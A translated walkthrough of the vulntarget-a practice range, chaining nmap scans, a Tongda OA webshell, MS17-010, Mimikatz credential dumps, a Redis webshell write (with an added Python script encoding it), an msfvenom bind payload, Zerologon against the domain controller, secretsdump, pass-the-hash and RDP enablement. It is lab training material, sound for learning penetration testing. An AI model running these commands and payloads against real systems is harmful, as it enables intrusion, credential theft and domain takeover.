
[Permanently open source] vulntarget-a walkthrough
Contents: 1. Topology · 2. First layer · 3. Lateral movement to the second machine · 4. CVE-2020-1472 privilege escalation to the domain controller

✎ Reading notice

The technical articles of Crow Security (烏鴉安全) are for reference only. The information in this article is intended solely for security personnel to test or maintain the websites, servers and other systems (including but not limited to) for which they are responsible. Without authorization, do not use the technical material in this article to intrude into any computer system. Any direct or indirect consequences and losses caused by using the information in this article are the sole responsibility of the user.

Crow Security reserves the right to modify, delete and interpret this article. If you repost or distribute it, you must keep the article intact; reposting without permission is prohibited.

The tools provided in this article are for learning only and may not be used for any other purpose. Please delete the tool files within 24 hours!!!

Author: 夏天 (Xia Tian). Published with the author's permission.

vulntarget disclaimer

The vulntarget range series is intended only for security professionals to practice penetration-testing techniques. The information provided by the range is intended solely for security personnel to test or maintain the websites, servers and other systems (including but not limited to) for which they are responsible. Without authorization, do not use the technical material from the range to intrude into any computer system. Any direct or indirect consequences and losses caused by using the information provided by the range are the sole responsibility of the user.

The vulntarget range series reserves the right to modify, delete and interpret the range series; it may not be used for other purposes without authorization.

vulntarget repository:

https://github.com/crow821/vulntarget

Stars are welcome 🌟

vulntarget setup series

vulntarget vulnerability range series (1)

vulntarget vulnerability range series (2): vulntarget-b

vulntarget vulnerability range series (3): vulntarget-c

1. Topology


Range download link

連結: https://pan.baidu.com/s/195iUmvbaKOhtn2S_O-F6TA 提取碼: jnkq           


Entry host: 192.168.0.4
Kali: 192.168.0.35

2. First layer

2.1 Port scan

Scan the entry host with nmap to see which ports are open:

┌──(kali㉿kali)-[~/Desktop]
└─$ nmap -sV -sC 192.168.0.4 -p- -T4 -v
Host is up (0.00083s latency).
Not shown: 65531 filtered tcp ports (no-response)
PORT    STATE SERVICE      VERSION
80/tcp  open  http         nginx
| http-methods: 
|_  Supported Methods: GET HEAD POST
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
| http-robots.txt: 1 disallowed entry 
|_/
|_http-title: \xCD\xA8\xB4\xEFOA\xCD\xF8\xC2\xE7\xD6\xC7\xC4\xDC\xB0\xEC\xB9\xAB\xCF\xB5\xCD\xB3
|_http-favicon: Unknown favicon MD5: 1205AF91D6B1638C23DE1132AE0C7E0B
135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
Service Info: Host: WIN7-PC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -2h40m00s, deviation: 4h37m07s, median: 0s
| smb-os-discovery: 
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
|   Computer name: win7-PC
|   NetBIOS computer name: WIN7-PC\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2022-01-26T09:56:17+08:00
| smb2-security-mode: 
|   2.1: 
|_    Message signing enabled but not required
| nbstat: NetBIOS name: WIN7-PC, NetBIOS user: <unknown>, NetBIOS MAC: 00:0c:29:24:f0:bb (VMware)
| Names:
|   WIN7-PC<00>          Flags: <unique><active>
|   WORKGROUP<00>        Flags: <group><active>
|   WIN7-PC<20>          Flags: <unique><active>
|   WORKGROUP<1e>        Flags: <group><active>
|   WORKGROUP<1d>        Flags: <unique><active>
|_  \x01\x02__MSBROWSE__\x02<01>  Flags: <group><active>
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-time: 
|   date: 2022-01-26T01:56:17
|_  start_date: 2022-01-26T01:49:34           


SMB is exposed, so check for MS17-010 with the nmap vuln scripts:

┌──(kali㉿kali)-[~/Desktop]
└─$ nmap --script=vuln 192.168.0.4 -p 445,135,139 -T4 -v
Host is up (0.0011s latency).

PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds

Host script results:
| smb-vuln-ms17-010: 
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|           
|     Disclosure date: 2017-03-14
|     References:
|       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|       https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|_smb-vuln-ms10-054: false
|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED
|_smb-vuln-ms10-061: NT_STATUS_ACCESS_DENIED           


nmap reports the host vulnerable to MS17-010 (CVE-2017-0143), and port 80 is open as well. The http-title bytes in the first scan are GBK-encoded 通达OA网络智能办公系统, i.e. a Tongda OA install, which is the target of the next step.

2.2 Tongda OA getshell

Getting a shell through the Tongda OA instance on port 80 (screenshots omitted). The resulting webshell:

http://192.168.0.4/rA4WmWb.php
Password: x


Connecting with AntSword gives SYSTEM privileges directly (screenshot omitted).

2.3 MS17-010

The scan reported the host vulnerable; exploiting it from Metasploit yields a meterpreter session (screenshots omitted).

Dump credentials:

meterpreter > creds_all
[+] Running as SYSTEM
[*] Retrieving all credentials
msv credentials
===============

Username  Domain   LM                                NTLM                              SHA1
--------  ------   --                                ----                              ----
win7      win7-PC  f0d412bd764ffe81aad3b435b51404ee  209c6174da490caeb422f3fa5a7ae634  7c87541fd3f3ef5016e12d411900c87a6046a8e8

wdigest credentials
===================

Username  Domain     Password
--------  ------     --------
(null)    (null)     (null)
WIN7-PC$  WORKGROUP  (null)
win7      win7-PC    admin

tspkg credentials
=================

Username  Domain   Password
--------  ------   --------
win7      win7-PC  admin

kerberos credentials
====================

Username  Domain     Password
--------  ------     --------
(null)    (null)     (null)
win7      win7-PC    admin
win7-pc$  WORKGROUP  (null)           


The network configuration reveals an internal segment: the host also has the address 10.0.20.98 (screenshot omitted).

Migrate into a more stable process automatically, then add routes for the subnets this host can reach:

meterpreter > run post/windows/manage/migrate 

[!] SESSION may not be compatible with this module:
[!]  * missing Meterpreter features: stdapi_sys_process_set_term_size
[*] Running module against WIN7-PC
[*] Current server process: spoolsv.exe (1128)
[*] Spawning notepad.exe process to migrate into
[*] Spoofing PPID 0
[*] Migrating into 3728
[+] Successfully migrated into process 3728


meterpreter > run post/multi/manage/autoroute 

[!] SESSION may not be compatible with this module:
[!]  * incompatible session platform: windows
[*] Running module against WIN7-PC
[*] Searching for subnets to autoroute.
[+] Route added to subnet 10.0.20.0/255.255.255.0 from host's routing table.
[+] Route added to subnet 192.168.0.0/255.255.255.0 from host's routing table.           


3. Lateral movement to the second machine

Scan the 10.0.20.0/24 segment through the session:

use auxiliary/scanner/portscan/tcp
set ports 22,23,80,443,8080,8081,3389,445,143,6379
set rhosts 10.0.20.0/24
set threads 20
run           

From the results: .98 is the Win7 host we already own; .99 has ports 80 and 6379 open.

Start the msf socks5 proxy (auxiliary/server/socks_proxy) so tools on Kali can reach the segment through the session:

msf6 auxiliary(server/socks_proxy) > run
[*] Auxiliary module running as background job 0.

[*] Starting the SOCKS proxy server           

Directory scan through the proxy:

python3 dirsearch.py -u "http://10.0.20.99/" --proxy=socks5://localhost:1080

dirsearch turns up phpinfo.php, which reveals the web root:

C:\phpStudy\PHPTutorial\WWW\phpinfo.php

Nothing else of interest on the web side. Testing 6379 shows Redis accepts commands without authentication (screenshot omitted).

The host is Windows and cannot reach the internet, so instead of a reverse shell, write a webshell into the web root through Redis (CONFIG SET dir / dbfilename, then SAVE):

┌──(kali㉿kali)-[~]
└─$ proxychains4 redis-cli -h 10.0.20.99
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.15
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.0.20.99:6379  ...  OK
10.0.20.99:6379> config set dir "C:/phpStudy/PHPTutorial/WWW/"
OK
10.0.20.99:6379> config set dbfilename xt.php
OK
10.0.20.99:6379> set 1 "<?php @eval($_POST['xt']);?>"
OK
10.0.20.99:6379> save
OK           
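The Redis primitive typed into redis-cli above, as an added example that is not part of the original write-up: it speaks RESP directly, first runs a non-destructive CONFIG GET dir probe to tell an open instance from one protected by requirepass or rename-command, and pre-encodes the same four-command sequence (CONFIG SET dir, CONFIG SET dbfilename, SET, SAVE) used to drop xt.php. The web root and payload are the ones from the write-up; the tcp_transport helper is only for a lab host you are authorised to test, and the script's own run uses constructed in-memory replies so it works offline.

```python
"""Added example: RESP encoder/decoder plus the unauthenticated-Redis webshell
write used in the write-up.  Network replies below are constructed stand-ins."""
import socket

WEBROOT = "C:/phpStudy/PHPTutorial/WWW/"      # path learned from phpinfo.php
PAYLOAD = "<?php @eval($_POST['xt']);?>"       # the one-line shell from the write-up


class RedisError(Exception):
    """A RESP error reply ('-' prefix); returned as a value, not raised."""


def encode(*args):
    """Encode one command as a RESP array of bulk strings (what redis-cli sends)."""
    out = [b"*%d\r\n" % len(args)]
    for a in args:
        a = a.encode() if isinstance(a, str) else a
        out.append(b"$%d\r\n%s\r\n" % (len(a), a))
    return b"".join(out)


def parse(buf):
    """Decode one RESP reply -> (value, remaining bytes)."""
    kind, end = buf[:1], buf.index(b"\r\n")
    line, rest = buf[1:end], buf[end + 2:]
    if kind == b"+":
        return line.decode(), rest
    if kind == b"-":
        return RedisError(line.decode()), rest
    if kind == b":":
        return int(line), rest
    if kind == b"$":
        n = int(line)
        return (None, rest) if n < 0 else (rest[:n], rest[n + 2:])
    if kind == b"*":
        items = []
        for _ in range(int(line)):
            v, rest = parse(rest)
            items.append(v)
        return items, rest
    raise ValueError("not RESP: %r" % buf[:16])


def probe(send):
    """Non-destructive check.  `send(bytes) -> bytes` is the transport.
    Returns 'auth-required', 'config-disabled', 'error:<msg>' or 'open:<dir>'."""
    reply, _ = parse(send(encode("CONFIG", "GET", "dir")))
    if isinstance(reply, RedisError):
        msg = str(reply)
        if msg.startswith("NOAUTH"):        # requirepass is set
            return "auth-required"
        if "unknown command" in msg:        # rename-command CONFIG "" in redis.conf
            return "config-disabled"
        return "error:" + msg
    return "open:" + reply[1].decode()      # reply is [b'dir', b'<path>']


def webshell_plan(webroot, filename, payload):
    """The four redis-cli commands from the write-up, in order, pre-encoded."""
    return [
        encode("CONFIG", "SET", "dir", webroot),
        encode("CONFIG", "SET", "dbfilename", filename),
        encode("SET", "1", payload),
        encode("SAVE"),
    ]


def tcp_transport(host, port=6379, timeout=5):
    """Real transport for an authorised lab host: one request, one short reply."""
    def send(data):
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.sendall(data)
            return s.recv(65536)
    return send


def fake_transport(replies):
    """Constructed stand-in for the target: maps an encoded command to a reply."""
    return lambda data: replies.get(data, b"-ERR unknown command\r\n")


# Constructed replies: an open instance and one with requirepass set.
OPEN_REDIS = fake_transport({encode("CONFIG", "GET", "dir"): encode("dir", WEBROOT)})
LOCKED_REDIS = fake_transport({encode("CONFIG", "GET", "dir"):
                               b"-NOAUTH Authentication required.\r\n"})

if __name__ == "__main__":
    print(probe(OPEN_REDIS))
    print(probe(LOCKED_REDIS))
    for cmd in webshell_plan(WEBROOT, "xt.php", PAYLOAD):
        print(cmd)
```

The probe deliberately reads the configuration instead of writing it, so it can be run as a check without touching the box. On the defensive side, any of requirepass, rename-command CONFIG "", bind 127.0.0.1 or protected-mode yes turns the result into auth-required or config-disabled, and a CONFIG SET dir pointing into a web root is a high-signal event to alert on in Redis logs.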

Connect to the written shell with AntSword (screenshots omitted).

quser shows the user win2016 logged on. ipconfig /all shows the domain vulntarget.com and a second internal address, 10.0.10.111.

tasklist: checking the process list for AV shows Windows Defender is present (screenshot omitted).

Get a session in msf with a bind (forward-connect) payload, since the host cannot connect out. Generate it:

msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=8091 -f exe > 8091_bind.exe

Handler configuration:

msf6 exploit(multi/handler) > options 

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/x64/meterpreter/bind_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LPORT     8091             yes       The listen port
   RHOST     10.0.20.99       no        The target address


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target

msf6 exploit(multi/handler) > run

[*] Started bind TCP handler against 10.0.20.99:8091
           

The backdoor runs but no session comes in; the most likely cause is the Windows firewall blocking the inbound port (screenshot omitted). Add an inbound rule for the bind port:

netsh advfirewall firewall add rule name="bind tcp" protocol=TCP dir=in localport=8091 action=allow

Run it again and the session comes in (screenshot omitted).

Load kiwi, migrate into another process, and dump the NTLM hashes:

meterpreter > load kiwi
Loading extension kiwi...
  .#####.   mimikatz 2.2.0 20191125 (x64/windows)
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'        Vincent LE TOUX            ( vincent.letoux@gmail.com )
  '#####'         > http://pingcastle.com / http://mysmartlogon.com  ***/

Success.
meterpreter > run post/windows/manage/migrate 

[!] SESSION may not be compatible with this module:
[!]  * missing Meterpreter features: stdapi_sys_process_set_term_size
[*] Running module against WIN2016
[*] Current server process: 8091_bind.exe (676)
[*] Spawning notepad.exe process to migrate into
[*] Spoofing PPID 0
[*] Migrating into 1764
[+] Successfully migrated into process 1764
meterpreter > creds_all
[+] Running as SYSTEM
[*] Retrieving all credentials
msv credentials
===============

Username  Domain      NTLM                              SHA1                                      DPAPI
--------  ------      ----                              ----                                      -----
WIN2016$  VULNTARGET  aabc352125765ee443568d0cdf27d62a  0aeb385e9aa49fa7e0be911d3b17da00f2aa7acd
WIN2016$  VULNTARGET  e0cd419213811fd910ca6c3c42d764e7  cd721f807e68ce07a4d0fe80b9356e93986d5ef1
win2016   VULNTARGET  dfc8d2bfa540a0a6e2248a82322e654e  cfa10f59337120a5ea6882b11c1c9f451f5f4ea6  27bd7cc4802079a6e008ed2d917c4323

wdigest credentials
===================

Username  Domain      Password
--------  ------      --------
(null)    (null)      (null)
WIN2016$  VULNTARGET  (null)
win2016   VULNTARGET  (null)

kerberos credentials
====================

Username  Domain          Password
--------  ------          --------
(null)    (null)          (null)
WIN2016$  vulntarget.com  NDjm,P3trN$LQ-$cZ9bE<VNzB$JaIR4>T+JNW7Qk?gHpDo(+H>zF^t-gG>,0MmLMBzfZ^ ]/oRL*<>j,WTp+5yF2cA.d%b>^:n/Bmf64:Qx.:/s5Y1">5>wZ
WIN2016$  vulntarget.com  c2 3e 11 5a 0e 59 54 f0 7c 60 e0 46 1a ab 19 68 4b a3 44 b4 0c 38 a7 ac 2a 67 ad 5d b9 ee 1b cc e4 5d 82 53 8e 21 d1 8c 7e 3a cb 06 e2 04 6a 2e 4d 35 5a a2 64 c3 85 4c a3 e2 84 9f 30 eb 02 20 3c ba 44 f0 e2 3f
                           27 ba 60 3b 91 d5 fa 53 fc 5b ae 4a c8 99 42 42 40 43 8b 35 43 cf 9c bb 10 7a dd 63 72 f6 ba 6c 7a 6b 42 fd 87 6e 76 d4 b4 71 78 4f 27 8f 26 a9 ae 63 c2 b0 dd 5e 20 21 ad 4e 4e 1d 71 5b 1a 14 e6 6f 85 ab 45 3
                          8 10 3a f5 ae fb 41 9b a9 bd a5 01 c7 d2 f1 36 42 ba 98 3b 41 7a 02 79 aa f2 cf 28 d1 f8 ab 4a 30 14 0c fe 6c 21 6f ec 5f 15 31 e8 6e 1c fd b0 b4 a6 a7 cc c3 f3 5a c3 51 98 54 31 5c 58 2f 01 f7 22 10 11 1b 31
                          91 fa 1a 35 8d 11 e9 c1 50 6c dc f8 c5 16 ad f4 ba 1c ed 5c fc f2 04 24 c8 d6 40 8f ac 87 f5
win2016   VULNTARGET.COM  (null)
win2016$  VULNTARGET.COM  (null)
win2016$  VULNTARGET.COM  c2 3e 11 5a 0e 59 54 f0 7c 60 e0 46 1a ab 19 68 4b a3 44 b4 0c 38 a7 ac 2a 67 ad 5d b9 ee 1b cc e4 5d 82 53 8e 21 d1 8c 7e 3a cb 06 e2 04 6a 2e 4d 35 5a a2 64 c3 85 4c a3 e2 84 9f 30 eb 02 20 3c ba 44 f0 e2 3f
                           27 ba 60 3b 91 d5 fa 53 fc 5b ae 4a c8 99 42 42 40 43 8b 35 43 cf 9c bb 10 7a dd 63 72 f6 ba 6c 7a 6b 42 fd 87 6e 76 d4 b4 71 78 4f 27 8f 26 a9 ae 63 c2 b0 dd 5e 20 21 ad 4e 4e 1d 71 5b 1a 14 e6 6f 85 ab 45 3
                          8 10 3a f5 ae fb 41 9b a9 bd a5 01 c7 d2 f1 36 42 ba 98 3b 41 7a 02 79 aa f2 cf 28 d1 f8 ab 4a 30 14 0c fe 6c 21 6f ec 5f 15 31 e8 6e 1c fd b0 b4 a6 a7 cc c3 f3 5a c3 51 98 54 31 5c 58 2f 01 f7 22 10 11 1b 31
                          91 fa 1a 35 8d 11 e9 c1 50 6c dc f8 c5 16 ad f4 ba 1c ed 5c fc f2 04 24 c8 d6 40 8f ac 87 f5


meterpreter >            

The win2016 password is Admin#123 (screenshot omitted).

Query the domain controller computer name:

net group "domain controllers" /domain
WIN2019           

Check the Enterprise Admins group:

net group "enterprise admins" /domain
administrator           

Ping the DC hostname to resolve its IP: 10.0.10.110 (screenshot omitted).

Add a route to the 10.0.10.0/24 segment through the win2016 session (screenshot omitted).

4. CVE-2020-1472 privilege escalation to the domain controller

win2016 is only an ordinary domain user, so go straight for Zerologon (CVE-2020-1472): the exploit resets the DC machine account (WIN2019$) password to the empty string, after which secretsdump can pull every hash from the DC using that empty password. Caveat outside a throwaway lab: resetting the DC machine account password desynchronises it from the password the DC itself holds in its LSA secrets, which breaks replication and other DC functions, so the original password must be restored afterwards (recover it from the DC's registry secrets once you have a shell and set it back).

┌──(kali㉿kali)-[~/Desktop/CVE-2020-1472/EXP]
└─$ proxychains4 python3 cve-2020-1472-exploit.py WIN2019 10.0.10.110
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.15
Performing authentication attempts...
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.0.10.110:135  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.0.10.110:49674  ...  OK
======================================================================================================
Target vulnerable, changing account password to empty string

Result: 0

Exploit complete!           

Now dump the domain hashes with secretsdump, authenticating as the machine account WIN2019$ with the now-empty password (-no-pass); the Administrator hash is in the output:

┌──(kali㉿kali)-[~/Desktop/impacket-0.9.24/examples]
└─$ proxychains4 python3 secretsdump.py vulntarget.com/WIN2019\$@10.0.10.110 -just-dc -no-pass
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.15
Impacket v0.9.23 - Copyright 2021 SecureAuth Corporation

[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.0.10.110:445  ...  OK
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.0.10.110:135  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.0.10.110:49667  ...  OK
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c7c654da31ce51cbeecfef99e637be15:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:a3dd8e4a352b346f110b587e1d1d1936:::
vulntarget.com\win2016:1601:aad3b435b51404eeaad3b435b51404ee:dfc8d2bfa540a0a6e2248a82322e654e:::
WIN2019$:1000:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WIN2016$:1602:aad3b435b51404eeaad3b435b51404ee:aabc352125765ee443568d0cdf27d62a:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:70a1edb09dbb1b58f1644d43fa0b40623c014b690da2099f0fc3a8657f75a51d
Administrator:aes128-cts-hmac-sha1-96:04c435638a00755c0b8f12211d3e88a1
Administrator:des-cbc-md5:dcc29476a789ec9e
krbtgt:aes256-cts-hmac-sha1-96:f7a968745d4f201cbeb73f4b1ba588155cfd84ded34aaf24074a0cfe95067311
krbtgt:aes128-cts-hmac-sha1-96:f401ac35dc1c6fa19b0780312408cded
krbtgt:des-cbc-md5:10efae67c7026dbf
vulntarget.com\win2016:aes256-cts-hmac-sha1-96:e4306bef342cd8215411f9fc38a063f5801c6ea588cc2fee531342928b882d61
vulntarget.com\win2016:aes128-cts-hmac-sha1-96:6da7e9e046c4c61c3627a3276f5be855
vulntarget.com\win2016:des-cbc-md5:6e2901311c32ae58
WIN2019$:aes256-cts-hmac-sha1-96:092c877c3b20956347d535d91093bc1eb16b486b630ae2d99c0cf15da5db1390
WIN2019$:aes128-cts-hmac-sha1-96:0dca147d2a216089c185d337cf643e25
WIN2019$:des-cbc-md5:01c8894f541023bc
WIN2016$:aes256-cts-hmac-sha1-96:64e86893159e2f036ee7d9a7a8312dfa9e2ab3b1435dcad3d372cac3d3530b54
WIN2016$:aes128-cts-hmac-sha1-96:efe65cbd2f33250e1f5d0baad8fa8719
WIN2016$:des-cbc-md5:911657540e94079b
[*] Cleaning up... 
           

Use the Administrator NT hash directly (pass-the-hash) to get a shell on the DC with smbexec:

┌──(kali㉿kali)-[~/Desktop/impacket-0.9.24/examples]
└─$ proxychains4 python3 smbexec.py -hashes aad3b435b51404eeaad3b435b51404ee:c7c654da31ce51cbeecfef99e637be15 administrator@10.0.10.110
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.15
Impacket v0.9.23 - Copyright 2021 SecureAuth Corporation

[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.0.10.110:445  ...  OK
[!] Launching semi-interactive shell - Careful what you execute
C:\Windows\system32>whoami
nt authority\system

C:\Windows\system32>hostname
win2019

C:\Windows\system32>           

Crack the Administrator hash with john: the password Admin@666 falls immediately:

┌──(kali㉿kali)-[~/Desktop]
└─$ john --wordlist=./pass.txt ./winhash.txt --format=NT
Using default input encoding: UTF-8
Loaded 1 password hash (NT [MD4 128/128 AVX 4x3])
Warning: no OpenMP support for this hash type, consider --fork=4
Press 'q' or Ctrl-C to abort, almost any other key for status
Admin@666        (Administrator)     
1g 0:00:00:00 DONE (2022-01-26 01:58) 100.0g/s 508800p/s 508800c/s 508800C/s admin333..Admin99
Use the "--show --format=NT" options to display all of the cracked passwords reliably
Session completed.            

Enable RDP (3389) in the registry, allow it through the firewall, and connect:

REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 00000000 /f


netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow           

To get an msf session on the DC as well: the firewall is on here too, so add the rule for the bind port first:

netsh advfirewall firewall add rule name="bind tcp" protocol=TCP dir=in localport=8091 action=allow
